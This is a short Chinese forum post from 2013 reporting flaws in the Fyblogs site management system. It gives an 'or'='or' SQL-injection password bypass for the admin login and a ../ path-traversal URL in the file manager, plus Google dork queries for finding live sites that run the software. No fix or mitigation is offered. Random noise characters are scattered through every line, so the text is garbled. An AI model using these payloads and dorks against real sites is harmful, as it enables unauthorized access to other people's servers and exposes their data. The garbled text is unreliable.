漏洞类型: 未授权访问/权限绕过# x% u6 u9 P" S. O* W0 v
2 ?; j$ X& F6 x$ h; _* t: S
简要描述:
5 s, p9 K0 E& h$ O/ E' p" V1 c
. B/ E+ i/ F d, z! {- W% tFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!# ]- w B+ n8 C( }
5 K3 K% d6 I+ V( o详细说明:
. z( x% ^1 }4 ]- X5 y3 I' ~, I: N+ `4 y/ o5 |8 d$ ]" f
后台万能密码 'or'='or'
: m7 t2 m$ [- U: Z2 ?+ O: L后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!' B+ X8 I+ O0 v8 C& l
admin/uploadfile.asp?currentFolder=/upfiles/../
& g1 w; T9 r8 Q% f/ _, D
, W- z: ]! L8 r9 t漏洞证明:
9 i+ x/ X" e# L( d2 M t
. M8 F& y" ~' P6 q谷歌:inurl:type.asp?id=1 新闻中心/ l1 w$ u" \3 ?( V0 o* i
或者 :inurl:download_ok.asp?
5 A" }) L$ C0 F% U& _/ H; T; h: n1 q$ S
可以测试
+ v- l- G h1 A) V; K* _8 S$ R S& Y, E* K" h6 @* n
# r' @6 \) p$ c |
发表于 2013-3-7 13:07:46
收藏
支持
反对